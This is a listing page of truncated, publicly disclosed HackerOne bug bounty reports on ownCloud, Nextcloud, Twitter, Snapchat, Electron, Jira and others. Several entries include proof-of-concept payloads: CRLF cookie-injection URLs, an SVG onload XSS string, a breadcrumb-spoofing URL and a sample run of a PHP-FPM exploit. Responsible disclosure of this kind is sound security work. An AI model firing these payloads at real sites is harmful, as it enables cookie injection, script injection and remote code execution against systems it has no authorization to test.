HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 1861 - 1880
This bug was reported directly to GitHub Security Lab.
## Summary: GitHub is a truly awesome service but it is unwise to put any sensitive data in code that is hosted on GitHub and similar services as I was able to find internal data as responsible disclosure I wanted to share it like this the only channel to do …
This bug was reported directly to GitHub Security Lab.
**Summary:** Long ago, i had an account on hackerone that is now deleted. I used the alias email provided by h1 to sigbup on a site for bug testing. To my surprise, i receive an email to my account routed from an alias email that should not exist. **Description:** ### …
**PoC**: `http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;` **HTTP Response**: ``` HTTP/1.1 301 Moved Permanently\r\n Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n Server: Apache\r\n Location: https://doc.owncloud.org/#\r < injection \r Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n ``` **Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org This vulnerability could be used in combination with others. For example, XSS via Cookie, bypass Double Submit Cookie …
**PoC**: `https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;` **HTTP Response**: ``` HTTP/1.1 301 Moved Permanently\r\n Date: Wed, 27 Jul 2016 10:28:01 GMT\r\n Server: Apache\r\n Strict-Transport-Security: max-age=63072000\r\n X-Xss-Protection: 1; mode=block\r\n Location: https://doc.owncloud.org/api/#\r < injection \r Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n ``` **Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org This vulnerability could be used in combination with others. For example, XSS via …
Hi! It's still possible to use an invalid `dir` param to spoof messages in the directory breadcrumbs area. For example, you can use URL-encoded periods to bypass the directory traversal prevention. By referencing a path that returns a 301, you can add a message in the dir param F108266: https://demo.nextcloud.com/index.php/apps/files/?dir=%2E%2E/%2E%2E/%2E%2E/.well-known/caldav/Error%20-%20please%20restart%20your%20computer%20to%20continue …
Hi Team, Description : When user has access to some feature like orders , Transfer etc. where comment section is available. Suppose staff members comments in it . Now owner of the account limited access to orders , then he won't be able to access his comments and he won't …
Hi Team , Note : I have reported multiple issues related to information which were closed a N/A due to some information lack. But this issue will look similar by title but it's different then other issues. Before testing anything i have insured that all other permissions are limited for …
**PoC** (Internet Explorer, Edge): ``` https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e ``` blackfan.ru/x?r - simple redirection script, that necessary for exploitation **HTTP Response**: ```html <div class="panel" id="message"> <div class="inner"> <h2 class="message-title">Information</h2> <p>No route found for "GET /<svg/onload=alert(document.domain)>/%2e%2e"</p> </div> </div> ```
Hey team, I've found a snapchat cdn domain here which had a test instance of fastly setup but did not remove the dns record when the service was cancelled. This allowed me to create a Fastly instance to take it over. I've confirmed this is a snapchat property via Censys …
**Hello** In twitter you can create cards to generate leads. For example: https://twitter.com/i/cards/tfw/v1/759046372544741376?cardname=promotion&autoplay_disabled=true&earned=true&lang=en&card_height=357 If you visit the above URL and click the button your email and username is sent to my domain. Since this page is missing X-FRAME-HEADERS, a user could simply iframe the URL and could steal victim's emails. …
Context isolation bypass via nested unserializable return value
Medium
$2,550
Closed
This issue is exploitable under either of two conditions: * If an API exposed to the main world via contextBridge can return an object or array that contains a JS object which cannot be serialized, for instance, a canvas rendering context. This would normally result in an exception being thrown …
The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image. This is due to the specific nginx configuration recommended for nextcloud: https://github.com/nextcloud/docker#base-version---fpm https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf Here's the exploit: https://github.com/neex/phuip-fpizdam Sample exploit run: # ./phuip-fpizdam http://localhost:8080/ocs/v2.php 2019/10/22 19:36:29 Base status code is 200 2019/10/22 19:36:30 Status code 502 for qsl=1765, adding …
**Description:** Multiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's …
**Summary:** Hi @security @zerotea, Hope you are doing well. Today I have found a special edge case where the names are still visible despite "Redact the names of the involved users" is selected on export as .pdf report. This is similar to the resolved reports #2109009 and #2054222. But this …